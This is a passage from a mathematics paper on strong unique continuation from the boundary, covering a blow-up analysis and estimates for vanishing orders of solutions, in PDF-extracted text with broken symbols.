1846
+ r2γ
1847
+ �′
1848
+ = r2γH′(r) − 2γr2γ−1H(r)
1849
+ r4γ
1850
+ = 2r−2γ−1(D(r) − γH(r)) + r−2γO(1)H(r)
1851
+ = 2r−2γ−1H(r) (N(r) − γ + rO(1))
1852
+ = 2r−2γ−1H(r)
1853
+ �� r
1854
+ 0
1855
+ [N ′(t) − V(t)] dt +
1856
+ � r
1857
+ 0
1858
+ V(t) dt + rO(1)
1859
+
1860
+ as r → 0+. Integrating over (r, ˜r) with ˜r ∈ (0, r0) small, we obtain that
1861
+ H(˜r)
1862
+ ˜r2γ
1863
+ − H(r)
1864
+ r2γ
1865
+ =
1866
+ � ˜r
1867
+ r
1868
+ 2ρ−2γ−1H(ρ)
1869
+ �� ρ
1870
+ 0
1871
+ V(t) dt
1872
+
1873
+
1874
+ (93)
1875
+ +
1876
+ � ˜r
1877
+ r
1878
+
1879
+ 2ρ−2γH(ρ)O(1) + 2ρ−2γ−1H(ρ)
1880
+ �� ρ
1881
+ 0
1882
+ [N ′(t) − V(t)] dt
1883
+ ��
1884
+ dρ.
1885
+ Letting
1886
+ f(ρ) := 2ρ−2γH(ρ)O(1) + 2ρ−2γ−1H(ρ)
1887
+ �� ρ
1888
+ 0
1889
+ [N ′(t) − V(t)] dt
1890
+
1891
+ ,
1892
+ from (82), (85) and (89) it follows that f ∈ L1(0, ˜r) and hence there exists the limit
1893
+ lim
1894
+ r→0+
1895
+ � ˜r
1896
+ r
1897
+ f(ρ) dρ =
1898
+ � ˜r
1899
+ 0
1900
+ f(ρ) dρ < +∞.
1901
+ On the other hand, in view of (81), there exists the limit
1902
+ lim
1903
+ r→0+
1904
+ � ˜r
1905
+ r
1906
+ 2ρ−2γ−1H(ρ)
1907
+ �� ρ
1908
+ 0
1909
+ V(t) dt
1910
+
1911
+ dρ.
1912
+ Therefore we can conclude thanks to (93).
1913
+
1914
+ 5. The blow-up analysis
1915
+ In the present section, we aim to classify the possible vanishing orders of solutions to (62). To
1916
+ this purpose, let W be a non trivial weak solution to (62) and H be defined in (67). For any
1917
+ λ ∈ (0, r0], we consider the function
1918
+ (94)
1919
+ V λ(z) := W(λz)
1920
+
1921
+ H(λ)
1922
+ .
1923
+ It is easy to verify that V λ weakly solves
1924
+
1925
+ div(t1−2s �A(λ·)∇V λ) = 0,
1926
+ on B+
1927
+ r0λ−1,
1928
+ − limt→0+ t1−2s�α(λ·) ∂V λ
1929
+ ∂t
1930
+ = κs,Nλ2s�h(λ·) Tr(V λ),
1931
+ on B′
1932
+ r0λ−1,
1933
+ where we have defined �α in (46). It follows that, for any λ ∈ (0, r0],
1934
+ (95)
1935
+
1936
+ B+
1937
+ 1
1938
+ t1−2s �A(λ·)∇V λ · ∇φ dz − κs,Nλ2s
1939
+
1940
+ B′
1941
+ 1
1942
+ �h(λ·) Tr(V λ) Tr(φ) dy = 0
1943
+ for every φ ∈ H1
1944
+ 0,S+
1945
+ 1 (B+
1946
+ 1 , t1−2s). Furthermore by (67) and (94)
1947
+ (96)
1948
+
1949
+ S+ θ1−2s
1950
+ N+1 µ(λθ)|V λ(θ)|2 dS = 1
1951
+ for any λ ∈ (0, r0].
1952
+ Proposition 5.1. For every R ≥ 1, the family of functions {V λ : λ ∈ (0, ¯r
1953
+ R]} is bounded in
1954
+ H1(B+
1955
+ R, t1−2s).
1956
+
1957
+ 18
1958
+ ALESSANDRA DE LUCA, VERONICA FELLI, AND GIOVANNI SICLARI
1959
+ Proof. By (66) and (90) we have that, for all λ ∈ (0, ¯r
1960
+ R] with ¯r as in Lemma 4.9,
1961
+
1962
+ B+
1963
+ R
1964
+ t1−2s|∇V λ|2 dz = λ2s−N
1965
+ H(λ)
1966
+
1967
+ B+
1968
+ λR
1969
+ t1−2s|∇W|2 dz ≤ λ2s−NR¯c
1970
+ H(λR)
1971
+
1972
+ B+
1973
+ λR
1974
+ t1−2s|∇W|2 dz
1975
+
1976
+ 2R¯c+N−2s
1977
+ 1 − 2κN,sη˜h(λR)N(λR) + 2(N − 2s)R¯c+N−2sκN,sη˜h(λR)
1978
+ 1 − 2κN,sη˜h(λR)
1979
+ ,
1980
+ which, together with (69) and (85), allows us to deduce that {∇V λ : λ ∈ (0, ¯r
1981
+ R]} is uniformly
1982
+ bounded in L2(B+
1983
+ R, t1−2s). On the other hand, (52), a scaling argument, and (90) imply that
1984
+
1985
+ S+
1986
+ R
1987
+ t1−2s|V λ|2dS = λ−N−1+2s
1988
+ H(λ)
1989
+
1990
+ S+
1991
+
1992
+ t1−2sW 2dS ≤ 2RN+1−2s H(Rλ)
1993
+ H(λ) ≤ 2RN+1−2s+¯c,
1994
+ so that the claim follows from (33).
1995
+
1996
+ Proposition 5.2. Let W be a non trivial weak solution to (62). Let γ be as in Proposition 4.8.
1997
+ There exists m0 ∈ N \ {0} (which is odd in the case N = 1) such that
1998
+ (97)
1999
+ γ = m0.
2000
+ Furthermore, for any sequence {λn} such that λn → 0+ as n → ∞, there exist a subsequence {λnk}
2001
+ and an eigenfunction Ψ of problem (19) associated with the eigenvalue µm0 = m2
2002
+ 0 + m0(N − 2s)
2003
+ such that ∥Ψ∥L2(S+,θ1−2s
2004
+ N+1 ) = 1 and
2005
+ (98)
2006
+ W(λnkz)
2007
+
2008
+ H(λnk)
2009
+ → |z|γΨ
2010
+ � z
2011
+ |z|
2012
+
2013
+ as k → +∞
2014
+ strongly in H1(B+
2015
+ 1 , t1−2s).
2016
+ Proof. Let W be a non trivial weak solution to (62) and {λn} be a sequence such that λn → 0+
2017
+ as n → +∞. Thanks to Proposition 5.1, there exist a subsequence {λnk} and V ∈ H1(B+
2018
+ 1 , t1−2s)
2019
+ such that
2020
+ (99)
2021
+ V λnk ⇀ V
2022
+ weakly in H1(B+
2023
+ 1 , t1−2s) as k → +∞.
2024
+ Observing that λnk ∈ (0, r0) and thus B+
2025
+ 1 ⊂ B+
2026
+ r0/λnk for sufficiently large k, from (95) we deduce
2027
+ that, for sufficiently large k,
2028
+ (100)
2029
+
2030
+ B+
2031
+ 1
2032
+ t1−2s �A(λnk·)∇V λnk · ∇φ dz = κs,Nλ2s
2033
+ nk
2034
+
2035
+ B′
2036
+ 1
2037
+ �h(λnk·) Tr(V λnk ) Tr(φ) dy
2038
+ for every φ ∈ H1
2039
+ 0,S+
2040
+ 1 (B+
2041
+ 1 , t1−2s). In order to study what happens as k → +∞, we notice that the
2042
+ term on the left hand side of (100) can be rewritten as follows
2043
+
2044
+ B+
2045
+ 1
2046
+ t1−2s �A(λnk·)∇V λnk · ∇φ dz
2047
+ (101)
2048
+ =
2049
+
2050
+ B+
2051
+ 1
2052
+ t1−2s( �A(λnk·) − IdN+1)∇V λnk · ∇φ dz +
2053
+
2054
+ B+
2055
+ 1
2056
+ t1−2s∇V λnk · ∇φ dz.
2057
+ Therefore, in view of (48), Proposition 5.1 and (99), we conclude that
2058
+ (102)
2059
+ lim
2060
+ k→+∞
2061
+
2062
+ B+
2063
+ 1
2064
+ t1−2s �A(λnk·)∇V λnk · ∇φ dz =
2065
+
2066
+ B+
2067
+ 1
2068
+ t1−2s∇V · ∇φ dz.
2069
+ As for the right hand side in (100), we have that
2070
+ ����λ2s
2071
+ nk
2072
+
2073
+ B′
2074
+ 1
2075
+ �h(λnk·) Tr(V λnk ) Tr(φ) dy
2076
+ ����
2077
+ (103)
2078
+ ≤ λ2s
2079
+ nkη˜h(λnk ·)(1)
2080
+ ��
2081
+ B+
2082
+ 1
2083
+ t1−2s|∇φ|2 dy
2084
+ �1
2085
+ 2��
2086
+ B+
2087
+ 1
2088
+ t1−2s|∇V λnk |2 dz + N − 2s
2089
+ 2
2090
+
2091
+ S+ θ1−2s
2092
+ N+1|V λnk |2 dS
2093
+ �1
2094
+ 2
2095
+
2096
+ STRONG UNIQUE CONTINUATION FROM THE BOUNDARY
2097
+ 19
2098
+ thanks to H¨older’s inequality and (30). By (31) and the change of variable x �→ λnkx, we obtain
2099
+ that
2100
+ λ2s
2101
+ nkη˜h(λnk·)(1) = SN,sω
2102
+ 4s2ε
2103
+ N(N+2sε)
2104
+ N
2105
+ λ2s
2106
+ nk∥�h(λnk·)∥L
2107
+ N
2108
+ 2s +ε(B′
2109
+ 1)
2110
+ (104)
2111
+ = SN,sω
2112
+ 4s2ε
2113
+ N(N+2sε)
2114
+ N
2115
+ ∥�h∥L
2116
+ N
2117
+ 2s +ε(B′
2118
+ λnk )λ
2119
+ 4s2ε
2120
+ N+2sε
2121
+ nk
2122
+ .
2123
+ Putting together (103) and (104), thanks to Proposition 5.1, (96), and (52) we infer that
2124
+ (105)
2125
+ lim
2126
+ k→+∞ λ2s
2127
+ nk
2128
+
2129
+ B′
2130
+ 1
2131
+ �h(λnk·) Tr(V λnk ) Tr(φ) dy = 0.
2132
+ Passing to the limit as k → +∞ in (100) we conclude that V weakly solves the following problem:
2133
+ (106)
2134
+
2135
+ div(t1−2s∇V ) = 0,
2136
+ in B+
2137
+ 1 ,
2138
+ limt→0+ t1−2s ∂V
2139
+ ∂t = 0,
2140
+ on B′
2141
+ 1.
2142
+ In particular V is smooth on B+
2143
+ 1 and V ̸≡ 0 since, by (53), (99) and the compactness of the trace
2144
+ operator in (28), (96) leads to
2145
+ (107)
2146
+
2147
+ S+ θ1−2s
2148
+ N+1V 2 dS = 1.
2149
+ Now we aim to show that, along a further subsequence,
2150
+ (108)
2151
+ V λnk → V
2152
+ strongly in H1(B+
2153
+ 1 , t1−2s) as k → +∞.
2154
+ To this purpose, we first notice that a change of variables in (65) yields
2155
+ (109)
2156
+
2157
+ B+
2158
+ 1
2159
+ t1−2s �A(λnk·)∇V λnk · ∇φ dz −
2160
+
2161
+ S+ θ1−2s
2162
+ N+1 �A(λnk·)∇V λnk · z φ dS
2163
+ = κs,Nλ2s
2164
+ nk
2165
+
2166
+ B′
2167
+ 1
2168
+ �h(λnk·) Tr(V λnk ) Tr(φ) dy
2169
+ for any φ ∈ H1(B+
2170
+ 1 , t1−2s) and k sufficiently large.
2171
+ From Proposition 5.1 and the regularity result contained in [12, Theorem 2.1] and recalled in
2172
+ Remark 3.5, it follows that, for k sufficiently large, {∇xV λnk } and
2173
+
2174
+ t1−2s ∂V λnk
2175
+ ∂t
2176
+
2177
+ are bounded uni-
2178
+ formly with respect to k in the spaces H1(B+
2179
+ 1 , t1−2s) and H1(B+
2180
+ 1 , t2s−1) respectively. Then, by the
2181
+ continuity of the trace operator Tr1 from H1(B+
2182
+ 1 , t1−2s) to L2(S+, θ1−2s
2183
+ N+1 ) and from H1(B+
2184
+ 1 , t2s−1)
2185
+ to L2(S+, θ2s−1
2186
+ N+1), we have that {Tr1(∇xV λnk )} is bounded in
2187
+
2188
+ L2(S+, θ1−2s
2189
+ N+1 )
2190
+ �N and
2191
+
2192
+ t1−2s ∂V λnk
2193
+ ∂t
2194
+
2195
+ is bounded in L2(S+, θ2s−1
2196
+ N+1). Therefore
2197
+
2198
+ S+ θ1−2s
2199
+ N+1 |∇V λnk |2 dS =
2200
+
2201
+ S+ θ1−2s
2202
+ N+1 |∇xV λnk |2 dS +
2203
+
2204
+ S+ θ2s−1
2205
+ N+1
2206
+ ����θ1−2s
2207
+ N+1
2208
+ ∂V λnk
2209
+ ∂t
2210
+ ����
2211
+ 2
2212
+ dS
2213
+ is bounded uniformly with respect to k. Taking into account (48), it follows that there exists
2214
+ f ∈ L2(S+, θ1−2s
2215
+ N+1 ) such that, up to a further subsequence,
2216
+ (110)
2217
+ �A(λnk·)∇V λnk · z ⇀ f
2218
+ weakly in L2(S+, θ1−2s
2219
+ N+1 ) as k → +∞.
2220
+ Thus by (102) and after proving (105) when φ ∈ H1(B+
2221
+ 1 , t1−2s) with the same argument (i.e.
2222
+ combining (30) with (104)), passing to the limit as k → +∞ in (109) we obtain that
2223
+ (111)
2224
+
2225
+ B+
2226
+ 1
2227
+ t1−2s∇V · ∇φ dz =
2228
+
2229
+ S+ θ1−2s
2230
+ N+1 fφ dS
2231
+ for any φ ∈ H1(B+
2232
+ 1 , t1−2s). Furthermore, by (110), combined with (99) and compactness of the
2233
+ trace operator in (28), we have that
2234
+ (112)
2235
+ lim
2236
+ k→+∞
2237
+
2238
+ S+ t1−2s �A(λnk·)∇V λnk · z V λnk dS =
2239
+
2240
+ S+ t1−2sfV dS.
2241
+
2242
+ 20
2243
+ ALESSANDRA DE LUCA, VERONICA FELLI, AND GIOVANNI SICLARI
2244
+ Hence, testing (109) with V λnk itself, taking into account (112), using (105) with φ = V λnk , and
2245
+ passing to the limit as k → +∞, we deduce that
2246
+ lim
2247
+ k→+∞
2248
+
2249
+ B+
2250
+ 1
2251
+ t1−2s �A(λnk·)∇V λnk · ∇V λnk dz =
2252
+
2253
+ S+ t1−2sfV dS,
2254
+ which, by (111) tested with V , implies that
2255
+ (113)
2256
+ lim
2257
+ k→+∞
2258
+
2259
+ B+
2260
+ 1
2261
+ t1−2sA(λnk·)∇V λnk · ∇V λnk dz =
2262
+
2263
+ B+
2264
+ 1
2265
+ t1−2s|∇V |2dz.
2266
+ Writing the left hand side in (113) as in (101), by (48) and Proposition 5.1 we infer that
2267
+ lim
2268
+ k→+∞
2269
+
2270
+ B+
2271
+ 1
2272
+ t1−2s|∇V λnk |2 dz =
2273
+
2274
+ B+
2275
+ 1
2276
+ t1−2s|∇V |2dz.
2277
+ This convergence, together with (99), allows us to conclude that ∇V λnk → ∇V in L2(B+
2278
+ 1 , t1−2s).
2279
+ In conclusion, combining this with the compactness of the trace operator given in (28), (108) easily
2280
+ follows from Remark 2.6.
2281
+ For any r ∈ (0, 1] and k ∈ N we define
2282
+ Hk(r) :=
2283
+ 1
2284
+ rN+1−2s
2285
+
2286
+ S+
2287
+ r
2288
+ t1−2sµ(λnk·)|V λnk |2 dS,
2289
+ Dk(r) :=
2290
+ 1
2291
+ rN−2s
2292
+ ��
2293
+ B+
2294
+ r
2295
+ t1−2s �A(λnk·)∇V λnk ·∇V λnk dz − ks,Nλ2s
2296
+ nk
2297
+
2298
+ B′r
2299
+ �h(λnk·)| Tr(V λnk )|2 dy
2300
+
2301
+ ,
2302
+ and
2303
+ HV (r) :=
2304
+ 1
2305
+ rN+1−2s
2306
+
2307
+ S+
2308
+ r
2309
+ t1−2sV 2 dS,
2310
+ DV (r) :=
2311
+ 1
2312
+ rN−2s
2313
+
2314
+ B+
2315
+ r
2316
+ t1−2s|∇V |2 dz.
2317
+ By Proposition 4.2 in the case �h = 0, �A = IdN+1 and µ = 1, it is clear that HV (r) > 0 for any
2318
+ r ∈ (0, 1]. Thus the frequency function
2319
+ NV (r) := DV (r)
2320
+ HV (r)
2321
+ r ∈ (0, 1]
2322
+ is well defined. Furthermore by (87), (108), a change of variables, and a combination of (30) and
2323
+ (104), we have that
2324
+ (114)
2325
+ γ =
2326
+ lim
2327
+ k→+∞ N(λnkr) =
2328
+ lim
2329
+ k→+∞
2330
+ Dk(r)
2331
+ Hk(r) = NV (r)
2332
+ for any r ∈ (0, 1]
2333
+ and hence N ′
2334
+ V (r) = 0 for a.e.
2335
+ r ∈ (0, 1].
2336
+ Arguing as in Proposition 4.6 in the case �h = 0,
2337
+ �A = IdN+1 and µ = 1, we can prove that
2338
+ N ′
2339
+ V (r) = 2r
2340
+ ��
2341
+ S+
2342
+ r t1−2sV 2 dS
2343
+ � ��
2344
+ S+
2345
+ r t1−2s|∇V · ν|2 dS
2346
+
2347
+
2348
+ ��
2349
+ S+
2350
+ r t1−2sV (∇V · ν) dS
2351
+ �2
2352
+ ��
2353
+ S+
2354
+ r t1−2sV 2 dS
2355
+ �2
2356
+ .
2357
+ Therefore we conclude that
2358
+ ��
2359
+ S+
2360
+ r
2361
+ t1−2sV 2 dS
2362
+ � ��
2363
+ S+
2364
+ r
2365
+ t1−2s|∇V · ν|2 dS
2366
+
2367
+ =
2368
+ ��
2369
+ S+
2370
+ r
2371
+ t1−2sV (∇V · ν) dS
2372
+ �2
2373
+ a.e. r ∈ (0, 1)
2374
+ where ν =
2375
+ z
2376
+ |z|, i.e. equality holds in the Cauchy-Schwartz inequality for the vectors V and ∇V · ν
2377
+ in L2(S+
2378
+ r , t1−2s) for a.e. r ∈ (0, 1). It follows that there exists a function ρ(r) defined a.e. such
2379
+ that, writing V in polar coordinates,
2380
+ (115)
2381
+ ∂V
2382
+ ∂r (rθ) = ρ(r)V (rθ)
2383
+ for a.e. r ∈ (0, 1) and for any θ ∈ S+.
2384
+ By (115) we have that
2385
+ (116)
2386
+
2387
+ S+
2388
+ r
2389
+ t1−2sV (∇V · ν) dS = ρ(r)
2390
+
2391
+ S+
2392
+ r
2393
+ t1−2sV 2 dS.
2394
+
2395
+ STRONG UNIQUE CONTINUATION FROM THE BOUNDARY
2396
+ 21
2397
+ In the case �h = 0, A = IdN+1 and µ = 1, (70) boils down to H′
2398
+ V =
2399
+ 2
2400
+ rN+1−2s
2401
+
2402
+ S+
2403
+ r t1−2sV ∂V
2404
+ ∂ν dS,
2405
+ since the perturbative term involves ∇µ, which now trivially equals 0. From this and (116) we
2406
+ deduce that ρ(r) =
2407
+ H′
2408
+ V (r)
2409
+ 2HV (r). At this point, we exploit (72) which, in the case �h = 0, A = IdN+1
2410
+ and µ = 1, becomes H′
2411
+ V (r) = 2
2412
+ rDV (r) and thus implies
2413
+ ρ(r) = 1
2414
+ r NV (r) = γ
2415
+ r ,
2416
+ where we used also (114). Then an integration over (r, 1) of (115) for any fixed θ ∈ S+ yields
2417
+ (117)
2418
+ V (rθ) = rγV (θ) = rγΨ(θ)
2419
+ for any (r, θ) ∈ (0, 1] × S+,
2420
+ where Ψ := V |S+. In view of [11, Lemma 2.1], (106) becomes
2421
+ γ(N − 2s + γ)r−1−2s+γθ1−2s
2422
+ N+1 Ψ(θ) + r−1−2s+γ divS+(θ1−2s
2423
+ N+1 ∇S+Ψ(θ)) = 0
2424
+ for any (r, θ) ∈ (0, 1]× S+, together with the boundary condition limθN+1→0+ θ1−2s
2425
+ N+1 ∇SΨ ·ν = 0 on
2426
+ S′. Since V λ is odd with respect to yN for any λ ∈ (0, r0] by (94) and (59), then also V is odd with
2427
+ respect to yN, so that Ψ ∈ H1
2428
+ odd(S+, θ1−2s
2429
+ N+1 ). By (117) and (107) we have that ∥Ψ∥L2(S+,θ1−2s
2430
+ N+1 ) = 1,
2431
+ so that Ψ ̸≡ 0 is an eigenfunction of problem (19) associated to the eigenvalue γ(γ + N − 2s).
2432
+ From (22) it follows that there exists m0 ∈ N \ {0} (which is odd in the case N = 1) such that
2433
+ γ(γ + N − 2s) = m0(m0 + N − 2s). Therefore, since γ ≥ 0 by Proposition 4.8, we conclude that
2434
+ γ = m0 thus proving (97). Moreover (98) follows from (108) and (117).
2435
+
2436
+ In Proposition 4.10 we have shown that there exists the limit limλ→0+ λ−2γH(λ) and it is
2437
+ non-negative. Now we prove that limλ→0+ λ−2γH(λ) > 0.
2438
+ To this end we define, for every λ ∈ (0, r0], m ∈ N \ {0}, k ∈ {1, . . . , Mm},
2439
+ (118)
2440
+ ϕm,k(λ) :=
2441
+
2442
+ S+ θ1−2s
2443
+ N+1 W(λθ)Ym,k(θ) dS,
2444
+ i.e.
2445
+ {ϕm,k(λ)}m,k are the Fourier coefficients of W(λ·) with respect to the orthonormal basis
2446
+ {Ym,k}m,k introduced in (25). For every λ ∈ (0, r0], m ∈ N \ {0}, k ∈ {1, . . ., Mm}, we also define
2447
+ Υm,k(λ) := −
2448
+
2449
+ B+
2450
+ λ
2451
+ t1−2s( �A − IdN+1)∇W · 1
2452
+ |z|∇SYm,k
2453
+ � z
2454
+ |z|
2455
+
2456
+ dz
2457
+ (119)
2458
+ +
2459
+
2460
+ S+
2461
+ λ
2462
+ t1−2s( �A − IdN+1)∇W · z
2463
+ |z|Ym,k
2464
+ � z
2465
+ |z|
2466
+
2467
+ dS
2468
+ + κN,s
2469
+
2470
+ B′
2471
+ λ
2472
+ �h(y) Tr(W) Tr
2473
+
2474
+ Ym,k
2475
+ � y
2476
+ |y|
2477
+ ��
2478
+ dy,
2479
+ where IdN+1 is the identity (N + 1) × (N + 1) matrix.
2480
+ Proposition 5.3. Let γ be as in (87) and let m0 ∈ N \ {0} be such that γ = m0 according to
2481
+ Proposition 5.2. For every k ∈ {1, . . . , Mm0} and r ∈ (0, r0]
2482
+ (120)
2483
+ ϕm0,k(λ) = λm0
2484
+ �ϕm0,k(r)
2485
+ rm0
2486
+ + m0r−2m0−N+2s
2487
+ 2m0 + N − 2s
2488
+ � r
2489
+ 0
2490
+ ρm0−1Υm0,k(ρ) dρ
2491
+
2492
+ + λm0 m0 + N − 2s
2493
+ 2m0 + N − 2s
2494
+ � r
2495
+ λ
2496
+ ρ−m0−N−1+2sΥm0,k(ρ) dρ + O
2497
+
2498
+ λm0+
2499
+ 4s2ε
2500
+ N+2sε
2501
+
2502
+ as λ → 0+.
2503
+ Proof. Let k ∈ {1, . . ., Mm0} and φ ∈ D(0, r0). Testing (63) with |z|−N−1+2sφ(|z|)Ym0,k
2504
+ � z
2505
+ |z|
2506
+
2507
+ ,
2508
+ since Ym0,k solves (21), we obtain that ϕm0,k satisfies
2509
+ (121)
2510
+ −ϕ′′
2511
+ m0,k − N + 1 − 2s
2512
+ λ
2513
+ ϕ′
2514
+ m0,k + µm0
2515
+ λ2 ϕm0,k = ζm0,k
2516
+
2517
+ 22
2518
+ ALESSANDRA DE LUCA, VERONICA FELLI, AND GIOVANNI SICLARI
2519
+ in the sense of distributions in (0, r0), where
2520
+ D′(0,r0)⟨ζm0,k, φ⟩D(0,r0) := κN,s
2521
+ � r0
2522
+ 0
2523
+ φ(λ)
2524
+ λ2−2s
2525
+ ��
2526
+ S′
2527
+ �h(λθ′) Tr(W(λ·))(θ′)Ym0,k(θ′, 0) dS′
2528
+
2529
+
2530
+
2531
+ � r0
2532
+ 0
2533
+ ��
2534
+ S+
2535
+ λ
2536
+ t1−2s(A − IdN+1)∇W · ∇(|z|−N−1+2sφ(|z|)Ym0,k
2537
+ � z
2538
+ |z|
2539
+
2540
+ ) dS
2541
+
2542
+ dλ.
2543
+ Furthermore, it is easy to verify that Υm0,k ∈ L1(0, r0) and
2544
+ Υ′
2545
+ m0,k(λ) = λN+1−2sζm0,k(λ)
2546
+ in the sense of distributions in (0, r0). Then equation (121) can be rewritten as follows
2547
+ (122)
2548
+ −(λ2m0+N+1−2s(λ−m0ϕm0,k(λ))′)′ = λm0Υ′
2549
+ m0,k(λ)
2550
+ in the sense of distributions in (0, r0). Integrating (122) over (λ, r) for any r ∈ (0, r0], we obtain
2551
+ that there exists a constant cm0,k(r) ∈ R which depends only on m0, k, r, such that
2552
+ (λ−m0ϕm0,k(λ))′ = −λ−m0−N−1+2sΥm0,k(λ)
2553
+ − m0λ−2m0−N−1+2s
2554
+
2555
+ cm0,k(r) +
2556
+ � r
2557
+ λ
2558
+ ρm0−1Υm0,k(ρ) dρ
2559
+
2560
+ in the sense of distributions in (0, r0). In particular we deduce that ϕm0,k ∈ W 1,1
2561
+ loc ((0, r0]) and a
2562
+ further integration over (λ, r) gives
2563
+ ϕm0,k(λ) =λm0
2564
+ �ϕm0,k(r)
2565
+ rm0
2566
+
2567
+ m0cm0,k(r)
2568
+ (2m0 + N − 2s)r2m0+N−2s
2569
+
2570
+ (123)
2571
+ + λm0 m0 + N − 2s
2572
+ 2m0 + N − 2s
2573
+ � r
2574
+ λ
2575
+ ρ−m0−N−1+2sΥm0,k(ρ) dρ
2576
+ + m0λ−m0−N+2s
2577
+ 2m0 + N − 2s
2578
+
2579
+ cm0,k(r) +
2580
+ � r
2581
+ λ
2582
+ ρm0−1Υm0,k(ρ) dρ
2583
+
2584
+ for every λ, r ∈ (0, r0]. Now we claim that
2585
+ (124)
2586
+ � r0
2587
+ 0
2588
+ ρ−m0−N−1+2s|Υm0,k(ρ)| dρ < +∞.
2589
+ By the H¨older inequality, a change of variables, (48), (94), Proposition 5.1, and (89) we have that
2590
+ λ−m0−N−1+2s
2591
+ �����
2592
+
2593
+ B+
2594
+ λ
2595
+ t1−2s( �A − IdN+1)∇W · 1
2596
+ |z|∇SYm0,k
2597
+ � z
2598
+ |z|
2599
+
2600
+ dz
2601
+ �����
2602
+ (125)
2603
+ ≤ λ−m0−N−1+2s
2604
+ ��
2605
+ B+
2606
+ λ
2607
+ t1−2s|( �A − IdN+1)∇W|2 dz
2608
+ �1
2609
+ 2��
2610
+ B+
2611
+ λ
2612
+ t1−2s
2613
+ |z|2
2614
+ ���∇SYm0,k
2615
+ � z
2616
+ |z|
2617
+ ����
2618
+ 2
2619
+ dz
2620
+ �1
2621
+ 2
2622
+ ≤ λ−m0−1O(λ)
2623
+
2624
+ H(λ)
2625
+ ��
2626
+ B+
2627
+ 1
2628
+ t1−2s|∇V λ|2 dz
2629
+ �1
2630
+ 2��
2631
+ B+
2632
+ 1
2633
+ t1−2s
2634
+ |z|2
2635
+ ���∇SYm0,k
2636
+ � z
2637
+ |z|
2638
+ ����
2639
+ 2
2640
+ dz
2641
+ �1
2642
+ 2
2643
+ ≤ const λ−m0�
2644
+ H(λ) ≤ const,
2645
+ where we used the fact that
2646
+
2647
+ B+
2648
+ 1
2649
+ t1−2s
2650
+ |z|2
2651
+ ���∇SYm0,k
2652
+ � z
2653
+ |z|
2654
+ ����
2655
+ 2
2656
+ dz =
2657
+ � 1
2658
+ 0
2659
+ ρN−1−2s
2660
+ ��
2661
+ S+ θ1−2s
2662
+ N+1 |∇SYm0,k(θ)|2 dS
2663
+
2664
+
2665
+ = m2
2666
+ 0 + m0(N − 2s)
2667
+ N − 2s
2668
+ .
2669
+
2670
+ STRONG UNIQUE CONTINUATION FROM THE BOUNDARY
2671
+ 23
2672
+ Dealing with the second term of (119), from an integration by parts, the H¨older inequality, (48)
2673
+ (94), Proposition 5.1, and (89) it follows that, for every r ∈ (0, r0],
2674
+ � r
2675
+ 0
2676
+ λ−m0−N−1+2s
2677
+ �����
2678
+
2679
+ S+
2680
+ λ
2681
+ t1−2s( �A − IdN+1)∇W · z
2682
+ |z|Ym0,k
2683
+ � z
2684
+ |z|
2685
+
2686
+ dS
2687
+ ����� dλ
2688
+ (126)
2689
+ ≤ const
2690
+ � r
2691
+ 0
2692
+ λ−m0−N+2s
2693
+ ��
2694
+ S+
2695
+ λ
2696
+ t1−2s|∇W|
2697
+ ���Ym0,k
2698
+ � z
2699
+ |z|
2700
+ ���� dS
2701
+
2702
+
2703
+ = const
2704
+
2705
+ r−m0−N+2s
2706
+
2707
+ B+
2708
+ r
2709
+ t1−2s|∇W|
2710
+ ���Ym0,k
2711
+ � z
2712
+ |z|
2713
+ ���� dz
2714
+ + (m0 + N − 2s)
2715
+ � r
2716
+ 0
2717
+ λ−m0−N−1+2s
2718
+ � �
2719
+ B+
2720
+ λ
2721
+ t1−2s|∇W|
2722
+ ���Ym0,k
2723
+ � z
2724
+ |z|
2725
+ ���� dz
2726
+
2727
+
2728
+
2729
+ ≤ const
2730
+
2731
+ r−m0+1�
2732
+ H(r) +
2733
+ � r
2734
+ 0
2735
+ λ−m0√
2736
+ H(λ) dλ
2737
+
2738
+ ≤ const r,
2739
+ taking into account that
2740
+
2741
+ B+
2742
+ λ
2743
+ t1−2s ���Ym0,k
2744
+ � z
2745
+ |z|
2746
+ ����
2747
+ 2
2748
+ dz =
2749
+ λN+2−2s
2750
+ N + 2 − 2s.
2751
+ By the H¨older inequality the third term in (119) can be estimated as
2752
+ λ−m0−N−1+2s
2753
+ �����
2754
+
2755
+ B′
2756
+ λ
2757
+ �h(y) Tr(W) Tr
2758
+
2759
+ Ym0,k
2760
+ � y
2761
+ |y|
2762
+ ��
2763
+ dy
2764
+ �����
2765
+ (127)
2766
+ ≤ λ−m0−N−1+2s
2767
+ ��
2768
+ B′
2769
+ λ
2770
+ |�h(y)|| Tr(W)|2 dy
2771
+ �1
2772
+ 2 ��
2773
+ B′
2774
+ λ
2775
+ |˜h(y)|
2776
+ ���Tr
2777
+
2778
+ Ym0,k
2779
+ � y
2780
+ |y|
2781
+ �����
2782
+ 2
2783
+ dy
2784
+ �1
2785
+ 2
2786
+ ≤ λ−m0−N−1+2sη|˜h|(λ)
2787
+ ��
2788
+ B+
2789
+ λ
2790
+ t1−2s|∇W|2 dz + N − 2s
2791
+
2792
+
2793
+ S+
2794
+ λ
2795
+ t1−2sW 2 dS
2796
+ �1
2797
+ 2
2798
+ ×
2799
+ ×
2800
+ ��
2801
+ B+
2802
+ λ
2803
+ t1−2s ���∇Ym0,k
2804
+ � z
2805
+ |z|
2806
+ ����
2807
+ 2
2808
+ dz + N − 2s
2809
+
2810
+
2811
+ S+
2812
+ λ
2813
+ t1−2s ���Ym0,k
2814
+ � z
2815
+ |z|
2816
+ ����
2817
+ 2
2818
+ dS
2819
+ �1
2820
+ 2
2821
+ ≤ λ−m0−1η|˜h|(λ)
2822
+
2823
+ H(λ)
2824
+ ��
2825
+ B+
2826
+ 1
2827
+ t1−2s|∇V λ|2dz + (N − 2s)
2828
+
2829
+ S+θ1−2s
2830
+ N+1 µ(λθ)|V λ|2 dS
2831
+ �1
2832
+ 2
2833
+ ×
2834
+ ×
2835
+
2836
+ λ2
2837
+
2838
+ B+
2839
+ 1
2840
+ t1−2s ���∇Ym0,k
2841
+ � z
2842
+ |z|
2843
+ ����
2844
+ 2
2845
+ dz + N − 2s
2846
+ 2
2847
+
2848
+ S+ θ1−2s
2849
+ N+1 |Ym0,k(θ)|2 dS
2850
+ �1
2851
+ 2
2852
+ ≤ const λ−m0−1η|˜h|(λ)
2853
+
2854
+ H(λ) ≤ const λ−1+
2855
+ 4s2ε
2856
+ N+2sε ,
2857
+ in view of (30), (31), (52), (89), (94), (96) and Proposition 5.1. Collecting estimates (125), (126)
2858
